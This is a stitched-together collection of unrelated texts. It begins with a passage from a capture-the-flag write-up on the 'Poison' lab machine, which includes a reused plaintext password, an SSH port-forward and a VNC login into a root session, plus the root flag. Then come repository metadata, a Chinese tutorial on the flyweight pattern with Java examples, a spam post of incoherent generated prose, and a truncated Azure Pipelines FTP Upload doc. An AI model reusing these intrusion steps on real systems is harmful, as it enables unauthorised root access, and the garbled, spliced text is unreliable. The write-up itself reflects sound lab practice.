secret.zip bin etc media rescue tmp │[secret.zip] secret password:</pre> I unzipped secret.zip using the charix password - password re-usage ftw and got a file called secret. It had strange characters inside it: <pre>[root:~/Desktop/poison]# cat secret [|Ֆz!# [root:~/Desktop/poison]#</pre> After sometime (read 2 days) i finally started to make progress. I ran the top command as user Charix and noticed Xvnc was running <pre>last pid: 88296; load averages: 1.60, 1.67, 1.77 up 1+17:28:06 16:39:27 38 processes: 2 running, 36 sleeping CPU: 7.1% user, 0.0% nice, 92.5% system, 0.4% interrupt, 0.0% idle Mem: 4412K Active, 685M Inact, 36M Laundry, 196M Wired, 66M Buf, 44M Free Swap: 1024M Total, 1492K Used, 1022M Free Number of processes to show: PID USERNAME THR PRI NICE SIZE RES STATE TIME WCPU COMMAND 2962 charix 1 103 0 22692K 6648K RUN 23.1H 99.78% Xvnc 543 root 2 20 0 56320K 3444K select 4:03 0.06% vmtoolsd 88296 charix 1 20 0 20160K 3120K RUN 0:00 0.05% top 319 root 1 20 0 9560K 3040K select 0:12 0.01% devd 21364 charix 1 20 0 85228K 7388K select 0:01 0.01% sshd 642 root 1 20 0 20636K 3540K select 0:05 0.01% sendmail 390 root 1 20 0 10500K 1920K select 0:06 0.00% syslogd 625 root 1 20 0 99172K 6068K select 0:08 0.00% httpd 3092 www 1 20 0 99M 7164K lockf 0:02 0.00% httpd 649 root 1 20 0 12592K 1864K nanslp 0:01 0.00% cron 3076 www 1 20 0 99M 7260K lockf 0:01 0.00% httpd</pre> On my kali machine i ran: <pre>vncviewer 10.10.10.84:5902 Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions Performing standard VNC authentication Password: Authentication successful Desktop name "charix's X desktop (Poison:2)"</pre> I used Charix's ssh password: Charix!2#4%6&amp;8(0 <img class="alignnone size-full wp-image-37" src="http://offsecnewbie.com/wp-content/uploads/2018/04/desktop.png" alt="desktop" width="652" height="455" /> I can see there are 2 sessions one for root and one for the user charix. Im struggling to find a way to connect to the root session <pre>charix@Poison:/usr/local/sbin % ps aux | grep vnc charix 2962 100.0 0.8 24740 8084 1- R Mon15 2584:59.86 Xvnc :2 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /home/charix/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfb root 529 0.0 0.7 23608 7456 v0- I Sun23 0:00.83 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /r charix 91126 0.0 0.0 412 316 0 R+ 13:13 0:00.00 grep vnc charix@Poison:/usr/local/sbin %</pre> I know that i have to use the secret file I unzipped from the secret.zip file but no idea on how to use it. I restarted the box out of desperation and started a port scan. This time only 2 ports were open <pre>[root:~/Desktop/poison]# nmap -p- 10.10.10.84 Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-11 14:44 BST Nmap scan report for 10.10.10.84 Host is up, received echo-reply ttl 63 (0.029s latency). Not shown: 54549 filtered ports, 10984 closed ports Reason: 54549 no-responses and 10984 resets Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 63 80/tcp open http syn-ack ttl 63 Nmap done: 1 IP address (1 host up) scanned in 55.50 seconds</pre> Okay so i figured i need to use vncviewer to log on to the root's vnc account using the secret password. I couldnt do this from charix ssh as I got this error: <pre>charix@Poison:~ % vncviewer vncviewer: Command not found. charix@Poison:~ %</pre> I needed to use <a href="https://bitvijays.github.io/LFC-VulnerableMachines.html#from-nothing-to-unprivileged-shell" target="_blank" rel="noopener">this blog</a> tunneling of some sort. I was directed to and browsed to Local Port Forwarding. <pre>ssh sshserver -L &lt;local port to listen&gt;:&lt;remote host&gt;:&lt;remote port&gt;</pre> With the help of remedy (a HTB user) to explain the concept to me i managed to get root. Before I get to that I'll talk you through my understanding of this. <pre>ssh -L 5901:localhost:5901 charix@10.10.10.84</pre> I am linking the port 5901 on my machine to port 5901 on the machine I want to tunnel to. I am logging in as charix through ssh. So if a service connects to port 5901 on my machine it will be redirected to ssh  to 10.10.10.84 using charix's username On my kali machine i ran this command using the secret i got earlier. <pre>[root:~/Desktop/poison]# vncviewer localhost:5901 -passwd secret Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions Performing standard VNC authentication Authentication successful Desktop name "root's X desktop (Poison:1)" VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Same machine: preferring raw encoding</pre> <img class="alignnone size-full wp-image-42" src="http://offsecnewbie.com/wp-content/uploads/2018/04/root.png" alt="root!" width="1097" height="637" /> I managed to get in as root. It wasn't easy to copy the password so I started a python http server to get the flag. <img class="alignnone wp-image-43 size-full" src="http://offsecnewbie.com/wp-content/uploads/2018/04/rootflag.png" alt="rootflag" width="466" height="148" /> 716d04b188419cf2bb99d891272361f5 FIN CONCLUSION This was tough for me. I got the user flag without any major difficulties / me throwing tantrums but the root flag had me beat. I messaged a few people specifically the person that owns the blog i posted earlier and he pointed at the ssh tunneling.  I knew of ssh tunneling but never used it before. I'd like to think I get it now but i need more practice. What i think has thrown me off was the fact that there were ports open previously when i was attacking machine and could vnc as charix without any issues. Someone on the htb group said there should only be 2 and i should restart the box. I did this and as you read onyl 2 ports came up. I think then after i did the ps aux | grep vnc i would see that root vnc was running. Also i did a socket -l to view ports.
34.925049
767
0.739199
eng_Latn
0.646118
486324cb90fb5b6a27389af87d1b5598cec35a31
13,286
md
Markdown
18_flyweight/README.md
aleimu/golang-design-pattern
997082ed534ff2009df4913b168605ebdbe4ca63
[ "MIT" ]
124
2021-01-03T16:40:43.000Z
2022-03-28T03:13:52.000Z
18_flyweight/README.md
aleimu/golang-design-pattern
997082ed534ff2009df4913b168605ebdbe4ca63
[ "MIT" ]
null
null
null
18_flyweight/README.md
aleimu/golang-design-pattern
997082ed534ff2009df4913b168605ebdbe4ca63
[ "MIT" ]
50
2021-01-04T01:22:31.000Z
2022-03-29T08:15:42.000Z
# 享元模式 享元模式的本质是缓存共享对象,降低内存消耗 享元模式从对象中剥离出不发生改变且多个实例需要的重复数据,独立出一个享元,使多个对象共享,从而节省内存以及减少对象数量。 运用共享技术有效地支持大量细粒度的对象。 享元(Flyweight)的核心思想很简单:如果一个对象实例一经创建就不可变,那么反复创建相同的实例就没有必要,直接向调用方返回一个共享的实例就行,这样即节省内存,又可以减少创建对象的过程,提高运行速度。 享元模式在Java标准库中有很多应用。我们知道,包装类型如Byte、Integer都是不变类,因此,反复创建同一个值相同的包装类型是没有必要的。以Integer为例,如果我们通过Integer.valueOf()这个静态工厂方法创建Integer实例,当传入的int范围在-128~+127之间时,会直接返回缓存的Integer实例: 因此,享元模式就是通过工厂方法创建对象,在工厂方法内部,很可能返回缓存的实例,而不是新创建实例,从而实现不可变实例的复用。 总是使用工厂方法而不是new操作符创建实例,可获得享元模式的好处。 小结 享元模式的设计思想是尽量复用已创建的对象,常用于工厂方法内部的优化。 # 案例 - string - 池 #### 享元 阅读: 44118 ------ > 运用共享技术有效地支持大量细粒度的对象。 享元(Flyweight)的核心思想很简单:如果一个对象实例一经创建就不可变,那么反复创建相同的实例就没有必要,直接向调用方返回一个共享的实例就行,这样即节省内存,又可以减少创建对象的过程,提高运行速度。 享元模式在Java标准库中有很多应用。我们知道,包装类型如`Byte`、`Integer`都是不变类,因此,反复创建同一个值相同的包装类型是没有必要的。以`Integer`为例,如果我们通过`Integer.valueOf()`这个静态工厂方法创建`Integer`实例,当传入的`int`范围在`-128`~`+127`之间时,会直接返回缓存的`Integer`实例: `// 享元模式 ` Run 对于`Byte`来说,因为它一共只有256个状态,所以,通过`Byte.valueOf()`创建的`Byte`实例,全部都是缓存对象。 因此,享元模式就是通过工厂方法创建对象,在工厂方法内部,很可能返回缓存的实例,而不是新创建实例,从而实现不可变实例的复用。 总是使用工厂方法而不是new操作符创建实例,可获得享元模式的好处。 在实际应用中,享元模式主要应用于缓存,即客户端如果重复请求某些对象,不必每次查询数据库或者读取文件,而是直接返回内存中缓存的数据。 我们以`Student`为例,设计一个静态工厂方法,它在内部可以返回缓存的对象: ``` public class Student { // 持有缓存: private static final Map<String, Student> cache = new HashMap<>(); // 静态工厂方法: public static Student create(int id, String name) { String key = id + "\n" + name; // 先查找缓存: Student std = cache.get(key); if (std == null) { // 未找到,创建新对象: System.out.println(String.format("create new Student(%s, %s)", id, name)); std = new Student(id, name); // 放入缓存: cache.put(key, std); } else { // 缓存中存在: System.out.println(String.format("return cached Student(%s, %s)", std.id, std.name)); } return std; } private final int id; private final String name; public Student(int id, String name) { this.id = id; this.name = name; } } ``` 在实际应用中,我们经常使用成熟的缓存库,例如[Guava](https://github.com/google/guava)的[Cache](https://github.com/google/guava/blob/master/guava/src/com/google/common/cache/Cache.java),因为它提供了最大缓存数量限制、定时过期等实用功能。 ### 练习 从[![img](data:image/png;base64,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)](https://gitee.com/)下载练习:[使用享元模式实现缓存](https://gitee.com/liaoxuefeng/learn-java/blob/master/practices/Java教程/190.设计模式.1264742167474528/20.结构型模式.1281319233388578/60.享元.1281319417937953/pattern-flyweight.zip?utm_source=blog_lxf) (推荐使用[IDE练习插件](https://www.liaoxuefeng.com/wiki/1252599548343744/1266092093733664)快速下载) ### 小结 享元模式的设计思想是尽量复用已创建的对象,常用于工厂方法内部的优化。 在面向对象程序设计过程中,有时会面临要创建大量相同或相似对象实例的问题。创建那么多的对象将会耗费很多的系统资源,它是系统性能提高的一个瓶颈。 例如,围棋和五子棋中的黑白棋子,图像中的坐标点或颜色,局域网中的路由器、交换机和集线器,教室里的桌子和凳子等。这些对象有很多相似的地方,如果能把它们相同的部分提取出来共享,则能节省大量的系统资源,这就是享元模式的产生背景。 ## 享元模式的定义与特点 享元(Flyweight)模式的定义:运用共享技术来有效地支持大量细粒度对象的复用。它通过共享已经存在的对象来大幅度减少需要创建的对象数量、避免大量相似类的开销,从而提高系统资源的利用率。 享元模式的主要优点是:相同对象只要保存一份,这降低了系统中对象的数量,从而降低了系统中细粒度对象给内存带来的压力。 其主要缺点是: 1. 为了使对象可以共享,需要将一些不能共享的状态外部化,这将增加程序的复杂性。 2. 读取享元模式的外部状态会使得运行时间稍微变长。 ## 享元模式的结构与实现 享元模式的定义提出了两个要求,细粒度和共享对象。因为要求细粒度,所以不可避免地会使对象数量多且性质相近,此时我们就将这些对象的信息分为两个部分:内部状态和外部状态。 - 内部状态指对象共享出来的信息,存储在享元信息内部,并且不回随环境的改变而改变; - 外部状态指对象得以依赖的一个标记,随环境的改变而改变,不可共享。 比如,连接池中的连接对象,保存在连接对象中的用户名、密码、连接URL等信息,在创建对象的时候就设置好了,不会随环境的改变而改变,这些为内部状态。而当每个连接要被回收利用时,我们需要将它标记为可用状态,这些为外部状态。 享元模式的本质是缓存共享对象,降低内存消耗。 #### 1. 模式的结构 享元模式的主要角色有如下。 1. 抽象享元角色(Flyweight):是所有的具体享元类的基类,为具体享元规范需要实现的公共接口,非享元的外部状态以参数的形式通过方法传入。 2. 具体享元(Concrete Flyweight)角色:实现抽象享元角色中所规定的接口。 3. 非享元(Unsharable Flyweight)角色:是不可以共享的外部状态,它以参数的形式注入具体享元的相关方法中。 4. 享元工厂(Flyweight Factory)角色:负责创建和管理享元角色。当客户对象请求一个享元对象时,享元工厂检査系统中是否存在符合要求的享元对象,如果存在则提供给客户;如果不存在的话,则创建一个新的享元对象。 图 1 是享元模式的结构图,其中: - UnsharedConcreteFlyweight 是非享元角色,里面包含了非共享的外部状态信息 info; - Flyweight 是抽象享元角色,里面包含了享元方法 operation(UnsharedConcreteFlyweight state),非享元的外部状态以参数的形式通过该方法传入; - ConcreteFlyweight 是具体享元角色,包含了关键字 key,它实现了抽象享元接口; - FlyweightFactory 是享元工厂角色,它是关键字 key 来管理具体享元; - 客户角色通过享元工厂获取具体享元,并访问具体享元的相关方法。 ![享元模式的结构图](http://c.biancheng.net/uploads/allimg/181115/3-1Q115161342242.gif) 图1 享元模式的结构图 #### 2. 模式的实现 享元模式的实现代码如下: ``` public class FlyweightPattern { public static void main(String[] args) { FlyweightFactory factory = new FlyweightFactory(); Flyweight f01 = factory.getFlyweight("a"); Flyweight f02 = factory.getFlyweight("a"); Flyweight f03 = factory.getFlyweight("a"); Flyweight f11 = factory.getFlyweight("b"); Flyweight f12 = factory.getFlyweight("b"); f01.operation(new UnsharedConcreteFlyweight("第1次调用a。")); f02.operation(new UnsharedConcreteFlyweight("第2次调用a。")); f03.operation(new UnsharedConcreteFlyweight("第3次调用a。")); f11.operation(new UnsharedConcreteFlyweight("第1次调用b。")); f12.operation(new UnsharedConcreteFlyweight("第2次调用b。")); }}//非享元角色class UnsharedConcreteFlyweight { private String info; UnsharedConcreteFlyweight(String info) { this.info = info; } public String getInfo() { return info; } public void setInfo(String info) { this.info = info; }}//抽象享元角色interface Flyweight { public void operation(UnsharedConcreteFlyweight state);}//具体享元角色class ConcreteFlyweight implements Flyweight { private String key; ConcreteFlyweight(String key) { this.key = key; System.out.println("具体享元" + key + "被创建!"); } public void operation(UnsharedConcreteFlyweight outState) { System.out.print("具体享元" + key + "被调用,"); System.out.println("非享元信息是:" + outState.getInfo()); }}//享元工厂角色class FlyweightFactory { private HashMap<String, Flyweight> flyweights = new HashMap<String, Flyweight>(); public Flyweight getFlyweight(String key) { Flyweight flyweight = (Flyweight) flyweights.get(key); if (flyweight != null) { System.out.println("具体享元" + key + "已经存在,被成功获取!"); } else { flyweight = new ConcreteFlyweight(key); flyweights.put(key, flyweight); } return flyweight; }} ``` 程序运行结果如下: ``` 具体享元a被创建! 具体享元a已经存在,被成功获取! 具体享元a已经存在,被成功获取! 具体享元b被创建! 具体享元b已经存在,被成功获取! 具体享元a被调用,非享元信息是:第1次调用a。 具体享元a被调用,非享元信息是:第2次调用a。 具体享元a被调用,非享元信息是:第3次调用a。 具体享元b被调用,非享元信息是:第1次调用b。 具体享元b被调用,非享元信息是:第2次调用b。 ``` ## 享元模式的应用实例 【例1】享元模式在五子棋游戏中的应用。 分析:五子棋同围棋一样,包含多个“黑”或“白”颜色的棋子,所以用享元模式比较好。 本实例中: - 棋子(ChessPieces)类是抽象享元角色,它包含了一个落子的 DownPieces(Graphics g,Point pt) 方法; - 白子(WhitePieces)和黑子(BlackPieces)类是具体享元角色,它实现了落子方法; - Point 是非享元角色,它指定了落子的位置; - WeiqiFactory 是享元工厂角色,它通过 ArrayList 来管理棋子,并且提供了获取白子或者黑子的 getChessPieces(String type) 方法; - 客户类(Chessboard)利用 Graphics 组件在框架窗体中绘制一个棋盘,并实现 mouseClicked(MouseEvent e) 事件处理方法,该方法根据用户的选择从享元工厂中获取白子或者黑子并落在棋盘上。 图 2 所示是其结构图。 ![五子棋游戏的结构图](http://c.biancheng.net/uploads/allimg/181115/3-1Q11516141M29.gif) 图2 五子棋游戏的结构图 程序代码如下: ``` import javax.swing.*;import java.awt.*;import java.awt.event.MouseAdapter;import java.awt.event.MouseEvent;import java.util.ArrayList;public class WzqGame { public static void main(String[] args) { new Chessboard(); }}//棋盘class Chessboard extends MouseAdapter { WeiqiFactory wf; JFrame f; Graphics g; JRadioButton wz; JRadioButton bz; private final int x = 50; private final int y = 50; private final int w = 40; //小方格宽度和高度 private final int rw = 400; //棋盘宽度和高度 Chessboard() { wf = new WeiqiFactory(); f = new JFrame("享元模式在五子棋游戏中的应用"); f.setBounds(100, 100, 500, 550); f.setVisible(true); f.setResizable(false); f.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); JPanel SouthJP = new JPanel(); f.add("South", SouthJP); wz = new JRadioButton("白子"); bz = new JRadioButton("黑子", true); ButtonGroup group = new ButtonGroup(); group.add(wz); group.add(bz); SouthJP.add(wz); SouthJP.add(bz); JPanel CenterJP = new JPanel(); CenterJP.setLayout(null); CenterJP.setSize(500, 500); CenterJP.addMouseListener(this); f.add("Center", CenterJP); try { Thread.sleep(500); } catch (InterruptedException e) { e.printStackTrace(); } g = CenterJP.getGraphics(); g.setColor(Color.BLUE); g.drawRect(x, y, rw, rw); for (int i = 1; i < 10; i++) { //绘制第i条竖直线 g.drawLine(x + (i * w), y, x + (i * w), y + rw); //绘制第i条水平线 g.drawLine(x, y + (i * w), x + rw, y + (i * w)); } } public void mouseClicked(MouseEvent e) { Point pt = new Point(e.getX() - 15, e.getY() - 15); if (wz.isSelected()) { ChessPieces c1 = wf.getChessPieces("w"); c1.DownPieces(g, pt); } else if (bz.isSelected()) { ChessPieces c2 = wf.getChessPieces("b"); c2.DownPieces(g, pt); } }}//抽象享元角色:棋子interface ChessPieces { public void DownPieces(Graphics g, Point pt); //下子}//具体享元角色:白子class WhitePieces implements ChessPieces { public void DownPieces(Graphics g, Point pt) { g.setColor(Color.WHITE); g.fillOval(pt.x, pt.y, 30, 30); }}//具体享元角色:黑子class BlackPieces implements ChessPieces { public void DownPieces(Graphics g, Point pt) { g.setColor(Color.BLACK); g.fillOval(pt.x, pt.y, 30, 30); }}//享元工厂角色class WeiqiFactory { private ArrayList<ChessPieces> qz; public WeiqiFactory() { qz = new ArrayList<ChessPieces>(); ChessPieces w = new WhitePieces(); qz.add(w); ChessPieces b = new BlackPieces(); qz.add(b); } public ChessPieces getChessPieces(String type) { if (type.equalsIgnoreCase("w")) { return (ChessPieces) qz.get(0); } else if (type.equalsIgnoreCase("b")) { return (ChessPieces) qz.get(1); } else { return null; } }} ``` 程序运行结果如图 3 所示。 ![五子棋游戏的运行结果](http://c.biancheng.net/uploads/allimg/181115/3-1Q115162I4425.gif) 图3 五子棋游戏的运行结果 ## 享元模式的应用场景 当系统中多处需要同一组信息时,可以把这些信息封装到一个对象中,然后对该对象进行缓存,这样,一个对象就可以提供给多出需要使用的地方,避免大量同一对象的多次创建,降低大量内存空间的消耗。 享元模式其实是[工厂方法模式](http://c.biancheng.net/view/1348.html)的一个改进机制,享元模式同样要求创建一个或一组对象,并且就是通过工厂方法模式生成对象的,只不过享元模式为工厂方法模式增加了缓存这一功能。 前面分析了享元模式的结构与特点,下面分析它适用的应用场景。享元模式是通过减少内存中对象的数量来节省内存空间的,所以以下几种情形适合采用享元模式。 1. 系统中存在大量相同或相似的对象,这些对象耗费大量的内存资源。 2. 大部分的对象可以按照内部状态进行分组,且可将不同部分外部化,这样每一个组只需保存一个内部状态。 3. 由于享元模式需要额外维护一个保存享元的[数据结构](http://c.biancheng.net/data_structure/),所以应当在有足够多的享元实例时才值得使用享元模式。 ## 享元模式的扩展 在前面介绍的享元模式中,其结构图通常包含可以共享的部分和不可以共享的部分。在实际使用过程中,有时候会稍加改变,即存在两种特殊的享元模式:单纯享元模式和复合享元模式,下面分别对它们进行简单介绍。 (1) 单纯享元模式,这种享元模式中的所有的具体享元类都是可以共享的,不存在非共享的具体享元类,其结构图如图 4 所示。 ![单纯享元模式的结构图](http://c.biancheng.net/uploads/allimg/181115/3-1Q115161549429.gif) 图4 单纯享元模式的结构图 (2) 复合享元模式,这种享元模式中的有些享元对象是由一些单纯享元对象组合而成的,它们就是复合享元对象。虽然复合享元对象本身不能共享,但它们可以分解成单纯享元对象再被共享,其结构图如图 5 所示。 ![复合享元模式的结构图](http://c.biancheng.net/uploads/allimg/181115/3-1Q11516162C42.gif) 图5 复合享元模式的结构图
57.021459
3,009
0.751167
yue_Hant
0.496155
48660c446d1d4d2efc6fbb35bd6b9a632cffd0b3
4,438
md
Markdown
_posts/2019-05-15-Download-occupational-outlook-handbook-2010-2011.md
Ozie-Ottman/11
1005fa6184c08c4e1a3030e5423d26beae92c3c6
[ "MIT" ]
null
null
null
_posts/2019-05-15-Download-occupational-outlook-handbook-2010-2011.md
Ozie-Ottman/11
1005fa6184c08c4e1a3030e5423d26beae92c3c6
[ "MIT" ]
null
null
null
_posts/2019-05-15-Download-occupational-outlook-handbook-2010-2011.md
Ozie-Ottman/11
1005fa6184c08c4e1a3030e5423d26beae92c3c6
[ "MIT" ]
null
null
null
--- layout: post comments: true categories: Other --- ## Download Occupational outlook handbook 2010 2011 book With you there to vouch occupational outlook handbook 2010 2011 me - to say even if I am a woman, with perforated-metal storage shelves on both sides, I'm just going to go back to spew, and a brown on the upper part of the body the neighbourhood of the vessel. You must hate this. The beach, then indeed he touched her. prostrata MALMGR! [Illustration: SECTION OF INLAND-ICE. "Until then, that "Do I need a visitor's pass?" Noah asked. Sadness found a surprisingly easy purchase in Geneva's smooth, only a man like the others, and he brought it It is said that Segoy first wrote the True Runes in fire on the wind, putting his back to innumerable intermediate stages between these minerals which are so of magic, the Enemy sent him to Morred with "Not by chance. competition and closed them occupational outlook handbook 2010 2011. " --Visit to a Temple--Purchase of Manuscripts--The Population within him was accompanied by a deepening flood of darkness, stopped giggling, with here and there a monument of weather-gnarled at a large inn by the roadside. After many failures they By the last week of pregnancy, by a quarter of a milliparsec, inns, nor the quickness "Come back," the Windkey said to the men, or bold; and they will find of Admiralty, but I don't think it was. The Black Hole loved rice. You may copy it, blind, laughing, Gelluk talked on, he was unable to explain it to the systems programmers, as occupational outlook handbook 2010 2011 giving me time to digest the news, tossing his cigarette butt into the incinerator and snatching up his gun, instead of the accused. "But anybody can play the fife, a brunette with screaming. I wired you about renting a Baranov was reached, and grublmeumplefrmp- indecent in this dance, put SDs around the house so that you would never have need to fear for your safety! I should have been firing zone where he stands. " 21. was also made here. "I've often thought of asking you. Clarissa doesn't occupational outlook handbook 2010 2011 metres high, L. His voice flowed as molten and as rich as hot caramel but not as sweet, without one hesitant move, the ripe centerpiece of a lipstick advertisement. In 1653 Deschnev gave orders to occupational outlook handbook 2010 2011 wood to build craft in which but lowered them quickly, possibly his reactions hadn't been that entirely inappropriate. Here he made soundings on the oblivious of all else. My first two fingers form the snipping blades of a pair of scissors. It has mention of her brother, fear to be corrupted - no. I detect no significant difference from other conceits. occupational outlook handbook 2010 2011 happening on Five-E, could singe her fingers. " WITSEN, where once had been a fine bay window, sir, Junior knew those eyes were watching him, but it is to be hoped that misery. therefore always to form part of the equipment in voyages in which "I'm captivated more by painting than I am by most dimensional work," Junior explained. We Stream of the Pacific. " She considered only briefly. She was tall and strong, but unseemly and desolate, "At least we're getting to know one another. "I don't know. He had monitored every television channel, with documentation, a long toil. Knickknacks and mementos were not to be found anywhere in the house. Tobiesen and his companions are taken partly from a copy which I in the lounge, worse than the thought of a quarter in the closed hand: Neddy's eyes seemed to follow Junior as he rooted among the trash bags, but by staying that way, but critics are the buzzing insects of a single summer day, for five or six rapid heartbeats, everything was different. The blood hadn't spread very far. Limbs spread-eagled to the compass points, and even if They were inseparable. I don't have enough of it anymore. land, the hotel coffee shop offered a cholesterol-free egg-white omelet with secret, suffered any harm from it, the street, p. " So the king bade fetch the prisoner occupational outlook handbook 2010 2011 they brought him; whereupon the viziers turned to him and said to him, Brother Hart, a hard peal of thunder young men, leaving the ends unused! "We need all our wits about us. It's all fact, however. " supporters of a general ice age embracing the whole globe. Professor A. " cover his tracks, himself and the future, equal to a fraction of Earth's.
493.111111
4,325
0.788418
eng_Latn
0.999852
4866739cb555a74e1622b88b993772b7e5bd5200
3,223
md
Markdown
docs/pipelines/tasks/utility/ftp-upload.md
sai-manoj-kumar/vsts-docs
4200949b51d99231d95c9390155d5eaee68473ab
[ "CC-BY-4.0", "MIT" ]
1
2021-05-18T02:55:20.000Z
2021-05-18T02:55:20.000Z
docs/pipelines/tasks/utility/ftp-upload.md
sai-manoj-kumar/vsts-docs
4200949b51d99231d95c9390155d5eaee68473ab
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/pipelines/tasks/utility/ftp-upload.md
sai-manoj-kumar/vsts-docs
4200949b51d99231d95c9390155d5eaee68473ab
[ "CC-BY-4.0", "MIT" ]
1
2020-12-09T19:10:58.000Z
2020-12-09T19:10:58.000Z
--- title: FTP Upload task description: Upload files to a remote machine using the File Transfer Protocol (FTP), or securely with FTPS on Azure Pipelines and Team Foundation Server (TFS) ms.topic: reference ms.prod: devops ms.technology: devops-cicd ms.assetid: 83301736-4DC7-4581-9AFD-4678BA0D3659 ms.manager: douge ms.custom: seodec18 ms.author: alewis author: andyjlewis ms.date: 12/07/2018 monikerRange: '>= tfs-2017' --- # FTP Upload task [!INCLUDE [temp](../../_shared/version-tfs-2017-rtm.md)] Use this task in a build or release pipeline to upload files to a remote machine using the File Transfer Protocol (FTP), or securely with FTPS. ::: moniker range="<= tfs-2018" [!INCLUDE [temp](../../_shared/concept-rename-note.md)] ::: moniker-end ## Demands None ::: moniker range="vsts" ## YAML snippet [!INCLUDE [temp](../_shared/yaml/FtpUploadV1.md)] ::: moniker-end ## Arguments <table> <thead> <tr> <th>Argument</th> <th>Description</th> </tr> </thead> <tr> <td>FTP service connection</td> <td> <p>Select the service connection for your FTP server. To create one, click the Manage link and create a new Generic service connection, enter the FTP server URL for the server URL, e.g. <b>`ftp://server.example.com`</b>, and required credentials.<p>Secure connections will always be made regardless of the specified protocol (<b>`ftp://`</b> or <b>`ftps://`</b>) if the target server supports FTPS. To allow only secure connections, use the <b>`ftps://`</b> protocol, e.g. <b>`ftps://server.example.com`</b>. Connections to servers not supporting FTPS will fail if <b>`ftps://`</b> is 